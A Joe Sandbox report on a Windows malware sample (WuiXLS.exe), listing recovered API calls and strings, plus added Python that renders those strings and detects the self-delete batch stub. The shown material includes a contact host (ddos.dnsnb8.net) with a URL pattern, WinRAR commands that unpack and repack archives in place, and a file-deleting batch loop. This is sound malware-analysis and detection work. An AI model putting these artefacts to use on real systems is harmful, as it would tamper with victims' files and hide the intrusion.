                                          • Instruction ID: 94746acccc2f1b22905aba62dada2c33625c0340b4ee17ab73fc8c6520c80f0b
                                          • Opcode Fuzzy Hash: fdfcbb9c46d2722e58875f0401eec90482097419f705e76a873ec3d29bc18c0c
                                          • Instruction Fuzzy Hash: 39F04436210649EBD7209E26DC04AA777EDAB50361F408636F556D10D0E774E6458BB0

                                          Control-flow Graph

                                          (graph image omitted; basic blocks 7060c7-706608, calling VirtualAlloc, VirtualFree and VirtualProtect, with a subcall to 7066c8)
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 007060DF
                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00706189
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007061A5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Virtual$Free$Alloc
                                          • String ID:
                                          • API String ID: 1852963964-0
                                          • Opcode ID: a8c3c720404d173a8c2c667b43543808c387c1cd609753710bd385afc45ac066
                                          • Instruction ID: 977faa4f513d2134ab1c34203ced7c6d385df7206f7921e0270394e562520f8c
                                          • Opcode Fuzzy Hash: a8c3c720404d173a8c2c667b43543808c387c1cd609753710bd385afc45ac066
                                          • Instruction Fuzzy Hash: E8114931A04659CFCB318F588CA17DD37E1FF01301F690619DE899B2D2DA792964CB94
                                          APIs
                                          • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WuiXLS.exe,?,?,?,?,?,?,007013EF), ref: 007011AB
                                          • OpenProcessToken.ADVAPI32(00000000,00000028,007013EF,?,?,?,?,?,?,007013EF), ref: 007011BB
                                          • AdjustTokenPrivileges.ADVAPI32(007013EF,00000000,?,00000010,00000000,00000000), ref: 007011EB
                                          • CloseHandle.KERNEL32(007013EF), ref: 007011FA
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,007013EF), ref: 00701203
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\WuiXLS.exe, xrefs: 007011A5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                          • String ID: C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                          • API String ID: 75692138-449498752
                                          • Opcode ID: a1b5bfc6f132429bf228f0da238c915cdb5d65183b2f3f23b80fac934170201a
                                          • Instruction ID: c586f3376807fe20a32c42ef387ad6d79aec30de184f938622f048133facc82a
                                          • Opcode Fuzzy Hash: a1b5bfc6f132429bf228f0da238c915cdb5d65183b2f3f23b80fac934170201a
                                          • Instruction Fuzzy Hash: D5012871901208EFDB00DFD4CD89AAEBBBDFB04304F108269E605E2190DB745F449B50
                                          APIs
                                          • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 007013BC
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 007013DA
                                          • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00701448
                                            • Part of subcall function 0070119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WuiXLS.exe,?,?,?,?,?,?,007013EF), ref: 007011AB
                                            • Part of subcall function 0070119F: OpenProcessToken.ADVAPI32(00000000,00000028,007013EF,?,?,?,?,?,?,007013EF), ref: 007011BB
                                            • Part of subcall function 0070119F: AdjustTokenPrivileges.ADVAPI32(007013EF,00000000,?,00000010,00000000,00000000), ref: 007011EB
                                            • Part of subcall function 0070119F: CloseHandle.KERNEL32(007013EF), ref: 007011FA
                                            • Part of subcall function 0070119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,007013EF), ref: 00701203
                                          Strings
                                          • SeDebugPrivilege, xrefs: 007013D3
                                          • C:\Users\user\AppData\Local\Temp\WuiXLS.exe, xrefs: 007013A8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                          • String ID: C:\Users\user\AppData\Local\Temp\WuiXLS.exe$SeDebugPrivilege
                                          • API String ID: 4123949106-1797348126
                                          • Opcode ID: 52e9e3a8fd25bca5e2cb103f3092ffda48294e57c74bb1230b65a31d24ebbe80
                                          • Instruction ID: 1be8ec2c0ec398891e12426a47d9c3873756b6a5eda659083167a101d98482ba
                                          • Opcode Fuzzy Hash: 52e9e3a8fd25bca5e2cb103f3092ffda48294e57c74bb1230b65a31d24ebbe80
                                          • Instruction Fuzzy Hash: DA314F71D00249EADF60DBA58C45FEEBBF8EB44705FA08269F504B3191D6789E45CB60

                                          Control-flow Graph

                                          (graph image omitted; basic blocks 70239d-70268f, calling strstr, CreateFileA, GetFileSize, CloseHandle, memset, strrchr, wsprintfA, Sleep, SetFilePointer, WriteFile, SetEndOfFile and RemoveDirectoryA, with subcalls to 701915, 70189d and 7029e2)
                                          APIs
                                          • strstr.MSVCRT ref: 007023CC
                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00702464
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00702472
                                          • CloseHandle.KERNEL32(?,00000000,00000000), ref: 007024A8
                                          • memset.MSVCRT ref: 007024B9
                                          • strrchr.MSVCRT ref: 007024C9
                                          • wsprintfA.USER32 ref: 007024DE
                                          • strrchr.MSVCRT ref: 007024ED
                                          • memset.MSVCRT ref: 007024F2
                                          • memset.MSVCRT ref: 00702505
                                          • wsprintfA.USER32 ref: 00702524
                                          • Sleep.KERNEL32(000007D0), ref: 00702535
                                          • Sleep.KERNEL32(000007D0), ref: 0070255D
                                          • memset.MSVCRT ref: 0070256E
                                          • wsprintfA.USER32 ref: 00702585
                                          • memset.MSVCRT ref: 007025A6
                                          • wsprintfA.USER32 ref: 007025CA
                                          • Sleep.KERNEL32(000007D0), ref: 007025D0
                                          • Sleep.KERNEL32(000007D0,?,?), ref: 007025E5
                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007025FC
                                          • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00702611
                                          • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00702642
                                          • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0070265B
                                          • SetEndOfFile.KERNEL32 ref: 0070266D
                                          • CloseHandle.KERNEL32(00000000), ref: 00702676
                                          • RemoveDirectoryA.KERNEL32(?), ref: 00702681
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                          • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2203340711-1636733187
                                          • Opcode ID: 3c56a75dc5a52adb78f01fb0024f7433829eabc3a855dfcc84788594bccd3f26
                                          • Instruction ID: 955c8496260bbaa6816cfd464f147f66f206a1c755294994f12ed52d1d719376
                                          • Opcode Fuzzy Hash: 3c56a75dc5a52adb78f01fb0024f7433829eabc3a855dfcc84788594bccd3f26
                                          • Instruction Fuzzy Hash: DF8190B2504344EBD710EF60DC49FABB7ECFB84704F00461AF644D21D1DB789A4A8B6A
                                          APIs
                                          • memset.MSVCRT ref: 00702766
                                          • memset.MSVCRT ref: 00702774
                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00702787
                                          • wsprintfA.USER32 ref: 007027AB
                                            • Part of subcall function 0070185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00701118), ref: 00701867
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701878
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701880
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701890
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701894
                                          • wsprintfA.USER32 ref: 007027C6
                                          • CopyFileA.KERNEL32(?,00704C80,00000000), ref: 007027D4
                                          • wsprintfA.USER32 ref: 007027F4
                                            • Part of subcall function 00701973: PathFileExistsA.KERNELBASE(\Np`Np,00000000,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 00701992
                                            • Part of subcall function 00701973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 007019BA
                                            • Part of subcall function 00701973: Sleep.KERNEL32(00000064), ref: 007019C6
                                            • Part of subcall function 00701973: wsprintfA.USER32 ref: 007019EC
                                            • Part of subcall function 00701973: CopyFileA.KERNEL32(?,?,00000000), ref: 00701A00
                                            • Part of subcall function 00701973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00701A1E
                                            • Part of subcall function 00701973: GetFileSize.KERNEL32(?,00000000), ref: 00701A2C
                                            • Part of subcall function 00701973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00701A46
                                            • Part of subcall function 00701973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00701A65
                                          • DeleteFileA.KERNEL32(?,?,00704E54,00704E58), ref: 0070281A
                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00704E54,00704E58), ref: 00702832
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                          • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                          • API String ID: 692489704-3642343254
                                          • Opcode ID: d6003e1e7ca818d739bdc3c361eac477336369eeb8862def93dec743e563c984
                                          • Instruction ID: cf9c4baa759ee57fb2220b9c12530ea4b0629ae49dfdfb36d9d5981d451eda9f
                                          • Opcode Fuzzy Hash: d6003e1e7ca818d739bdc3c361eac477336369eeb8862def93dec743e563c984
                                          • Instruction Fuzzy Hash: E6212FF694021CFBEB10E7A49C89EDB77ACEB04744F4046A1B644E20C2E6789F448AA4
                                          APIs
                                            • Part of subcall function 0070185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00701118), ref: 00701867
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701878
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701880
                                            • Part of subcall function 0070185B: srand.MSVCRT ref: 00701890
                                            • Part of subcall function 0070185B: rand.MSVCRT ref: 00701894
                                          • wsprintfA.USER32 ref: 007015AA
                                          • wsprintfA.USER32 ref: 007015C6
                                          • lstrlen.KERNEL32(?), ref: 007015D2
                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 007015EE
                                          • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00701609
                                          • CloseHandle.KERNEL32(00000000), ref: 00701612
                                          • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0070162D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                          • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WuiXLS.exe$open
                                          • API String ID: 617340118-1033353869
                                          • Opcode ID: a153dea90508d003ee962c787ef7fce64f93edffc5c3c0cccf1bc6e356ca50b5
                                          • Instruction ID: edd2c95acc6e9fa887483552a3d45a559e7473e98d1f4e7328b38ee5eea2ca70
                                          • Opcode Fuzzy Hash: a153dea90508d003ee962c787ef7fce64f93edffc5c3c0cccf1bc6e356ca50b5
                                          • Instruction Fuzzy Hash: ED1177B2A0112CFFD72097A5DC89DEB7BACEF59750F004251F649E2080DE789B848BB0
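The format strings the sandbox recovered describe two of the behaviours a responder would want to recognise on disk: the routine ending at 0070162D writes a `%s%.8x.bat` file containing a `:DELFILE` loop and runs it via ShellExecuteA("open"), so the dropper can be deleted once its process exits; the routine starting at 0070239D drives WinRAR with `%s X -ibck "%s" "%s\"` and `%s M %s -r -o+ -ep1 "%s" "%s\*"` around a CreateFileA / SetFilePointer / WriteFile / SetEndOfFile sequence, i.e. it unpacks an archive, modifies the contents and moves them back in. The SHGetSpecialFolderPathA call with CSIDL 0x26 (CSIDL_PROGRAM_FILES) in the record at 00702787, together with the `\WinRAR\Rar.exe` and `%s\%s` strings, is consistent with the sample resolving Rar.exe under Program Files. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it renders those format strings with placeholder values and runs a content check for the batch stub over a constructed directory. Assumptions, also marked in the code: the line breaks in the batch body (the sandbox prints the string with them collapsed), the placeholder paths and the 0xDEADBEEF suffix, and which path fills the third `%s` of the `M` command, which the report does not show.

```python
"""
Added example (not from the Joe Sandbox report or the sample): renders the
format strings recovered above into the artifacts they produce and checks a
directory for the self-delete batch stub. Paths, the 8-hex-digit suffix and
the batch line breaks are assumptions made for illustration.
"""
import os
import re
import tempfile

# Format strings exactly as listed in the report's "String ID" lines.
BAT_NAME_FMT = "%s%.8x.bat"
# The sandbox prints the batch body with its line breaks collapsed; splitting
# it into the four CMD lines below is an assumption.
BAT_BODY_FMT = ':DELFILE\ndel "%s"\nif exist "%s" goto :DELFILE\ndel "%s"\n'
RAR_MOVE_FMT = '%s M %s -r -o+ -ep1 "%s" "%s\\*"'
RAR_EXTRACT_FMT = '%s X -ibck "%s" "%s\\"'

# Matches the stub however the lines were broken (or not broken at all);
# case-insensitive because CMD keywords are.
SELF_DELETE_RE = re.compile(
    r':DELFILE\s*del\s+"[^"]+"\s*if\s+exist\s+"[^"]+"\s+goto\s+:DELFILE', re.I)


def build_self_delete_bat(temp_dir: str, suffix: int, target_exe: str) -> tuple:
    """Return (path, body) of the batch file the routine at 007015AA writes.

    The loop keeps deleting target_exe until the still-running dropper has
    exited, then the last line deletes the batch file itself (third %s).
    """
    bat_path = BAT_NAME_FMT % (temp_dir, suffix & 0xFFFFFFFF)
    body = BAT_BODY_FMT % (target_exe, target_exe, bat_path)
    return bat_path, body


def build_rar_commands(rar_exe: str, archive: str, file_spec: str, work_dir: str) -> tuple:
    """Return the (extract, repack) WinRAR command lines from the routine at 0070239D.

    X -ibck        extract `archive` into work_dir, background mode
    M -r -o+ -ep1  move files into `archive`: recurse, overwrite, drop base dir
    Which path fills the third %s of the M command is not recoverable from the
    report; file_spec is a placeholder for it (assumption).
    """
    extract = RAR_EXTRACT_FMT % (rar_exe, archive, work_dir)
    repack = RAR_MOVE_FMT % (rar_exe, archive, file_spec, work_dir)
    return extract, repack


def find_self_delete_stubs(root: str) -> list:
    """Return sorted paths of .bat files under root whose content matches the stub."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(".bat"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                if SELF_DELETE_RE.search(fh.read()):
                    hits.append(path)
    return sorted(hits)


def demo() -> dict:
    """Write a constructed sample tree (one stub, one benign .bat) and scan it."""
    with tempfile.TemporaryDirectory() as td:
        bat_path, body = build_self_delete_bat(
            td + os.sep, 0xDEADBEEF, os.path.join(td, "WuiXLS.exe"))
        with open(bat_path, "w") as fh:
            fh.write(body)
        with open(os.path.join(td, "benign.bat"), "w") as fh:
            fh.write("@echo off\necho hello\n")
        return {"written": bat_path, "hits": find_self_delete_stubs(td)}


if __name__ == "__main__":
    print(demo())
    print(*build_rar_commands(r"C:\Program Files\WinRAR\Rar.exe", r"D:\share\docs.rar",
                              r"C:\Users\user\AppData\Local\Temp\c_31892.nls",
                              r"C:\Users\user\AppData\Local\Temp\docs"), sep="\n")
```

The regex deliberately tolerates the collapsed form the sandbox printed as well as a properly line-broken script, so it can be run over both recovered strings and files found in a user's Temp directory.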
                                          APIs
                                          • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00701400), ref: 00701226
                                          • GetProcAddress.KERNEL32(00000000), ref: 0070122D
                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00701400), ref: 0070123F
                                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00701400), ref: 00701250
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\WuiXLS.exe,?,?,?,?,00701400), ref: 0070129E
                                          • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\WuiXLS.exe,?,?,?,?,00701400), ref: 007012B0
                                          • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\WuiXLS.exe,?,?,?,?,00701400), ref: 007012F5
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00701400), ref: 0070130A
                                          Strings
                                          • ZwQuerySystemInformation, xrefs: 00701212
                                          • ntdll.dll, xrefs: 00701219
                                          • C:\Users\user\AppData\Local\Temp\WuiXLS.exe, xrefs: 00701262
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                          • String ID: C:\Users\user\AppData\Local\Temp\WuiXLS.exe$ZwQuerySystemInformation$ntdll.dll
                                          • API String ID: 1500695312-1797695780
                                          • Opcode ID: ee63abdb11f4009a676e4e3587886a4f20ce0e515abc60446fbcda3c091de9fb
                                          • Instruction ID: 7f69a1524647713a8d2c3b026fb14f25efef513a934f2e1f3f86708e3a110271
                                          • Opcode Fuzzy Hash: ee63abdb11f4009a676e4e3587886a4f20ce0e515abc60446fbcda3c091de9fb
                                          • Instruction Fuzzy Hash: E421D571705311EBD7209B65CC08B6BBAEDFB89B01F804B19F545D62C0D778DA44C7A9
                                          APIs
                                          • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGp,http://%s:%d/%s/%s,007010E8,?), ref: 00701018
                                          • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76C08400), ref: 00701029
                                          • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00701038
                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0070104B
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00701075
                                          • CloseHandle.KERNEL32(?), ref: 0070108B
                                          • CloseHandle.KERNEL32(00000000), ref: 0070108E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                          • String ID: HGp$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                          • API String ID: 1223616889-2904897572
                                          • Opcode ID: 46827b8024e012a84d000dab7db8cc7d36bc6cca312774f86f6ac8a14b5b1d15
                                          • Instruction ID: 1619958b9df170cf1e362f4c0083a8ad8c46523b2dfb460312c947177bd3ab9a
                                          • Opcode Fuzzy Hash: 46827b8024e012a84d000dab7db8cc7d36bc6cca312774f86f6ac8a14b5b1d15
                                          • Instruction Fuzzy Hash: F30184B150125CFFE7305F609C88E2BBBEDDB44799F008729F285A2090DA785E448B64
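The CreateFileA calls recorded in these function listings (ref 00702464, 007025FC, 00702832, 007015EE, the subcall at 007019BA, and 00701018 just above) carry the raw dwDesiredAccess, dwShareMode and dwCreationDisposition values, which is where the behaviour is: C0000000 with OPEN_EXISTING is a read/write open of a file that already exists (the targets of the WriteFile/SetEndOfFile and the CreateFileMappingA/MapViewOfFile sequences), while 80000000 with FILE_SHARE_READ is a read-only open of a source file. The Python below is an added example, not part of the Joe Sandbox report or the sample: it parses API lines in the format shown on this page and decodes those three arguments against the Win32 constants. The sample lines are copied from the records above; the line grammar (bullet, optional "Part of subcall function" prefix, `API.MODULE(args)`, `ref: ADDR`) is inferred from them, and the sandbox's `?` for an unresolved argument is reported as unknown rather than guessed.

```python
"""
Added example (not from the Joe Sandbox report or the sample): parses the
"APIs" lines of a function record in the format shown on this page and
decodes the CreateFileA arguments the sandbox captured. Sample lines are
copied from the records above; the line grammar is inferred from them.
"""
import re
from dataclasses import dataclass

# bullet, optional subcall prefix, API.MODULE, optional (args), ref: ADDR
API_LINE = re.compile(
    r'^\s*[•*-]?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?'
    r'([^\s.(]+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$')

# Win32 constants for the decoded arguments.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
WRITE_BITS = 0x40000000 | 0x10000000  # GENERIC_WRITE | GENERIC_ALL


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    subcall: bool


def parse_api_lines(text: str) -> list:
    """Parse every API line in text; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group(3)
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        calls.append(ApiCall(m.group(1), m.group(2), args, int(m.group(4), 16),
                             "Part of subcall function" in line))
    return calls


def _hex(arg):
    """The sandbox prints unresolved values as '?'; anything non-hex is unknown."""
    try:
        return int(arg, 16)
    except (TypeError, ValueError):
        return None


def _flag_names(value: int, table: dict) -> list:
    return [name for bit, name in table.items() if value & bit] or ["0"]


def decode_createfile(call: ApiCall) -> dict:
    """Decode dwDesiredAccess, dwShareMode and dwCreationDisposition.

    The sandbox lists the 7 CreateFileA parameters first and may append
    further stack values after them, so only positions 1, 2 and 4 are used.
    """
    if call.api not in ("CreateFileA", "CreateFileW"):
        raise ValueError(f"not a CreateFile call: {call.api}")
    a = call.args + [None] * 7
    access, share, disp = _hex(a[1]), _hex(a[2]), _hex(a[4])
    return {
        "ref": f"{call.ref:08X}",
        "subcall": call.subcall,
        "access": _flag_names(access, ACCESS) if access is not None else ["?"],
        "share": _flag_names(share, SHARE) if share is not None else ["?"],
        "disposition": DISPOSITION.get(disp, "?") if disp is not None else "?",
        "writes": access is not None and bool(access & WRITE_BITS),
        "creates": disp in (1, 2, 4),
    }


def summarize_file_opens(text: str) -> list:
    """Decode every CreateFileA/W line in a block of report text."""
    return [decode_createfile(c) for c in parse_api_lines(text)
            if c.api in ("CreateFileA", "CreateFileW")]


# Constructed sample: lines copied from the function records on this page.
SAMPLE = """\
• strstr.MSVCRT ref: 007023CC
• CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00702464
• GetFileSize.KERNEL32(00000000,00000000), ref: 00702472
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00704E54,00704E58), ref: 00702832
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 007015EE
  • Part of subcall function 00701973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 007019BA
• CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGp,http://%s:%d/%s/%s,007010E8,?), ref: 00701018
• CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00701038
• ??2@YAPAXI@Z.MSVCRT ref: 007026CE
"""

if __name__ == "__main__":
    for row in summarize_file_opens(SAMPLE):
        print(row)
```

The same approach extends to the mapping record at 00701038 and 0070104B: CreateFileMappingA's flProtect of 00000004 is PAGE_READWRITE and MapViewOfFile's 000F001F is FILE_MAP_ALL_ACCESS, so the file opened read/write at 00701018 is mapped writable, which is what an in-place file modifier needs.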
                                          APIs
                                          • memset.MSVCRT ref: 007018B1
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75570F00,76C08400), ref: 007018D3
                                          • CloseHandle.KERNEL32(I%p), ref: 007018E9
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007018F0
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00701901
                                          • CloseHandle.KERNEL32(?), ref: 0070190A
                                          Strings
                                          Memory Dump Source
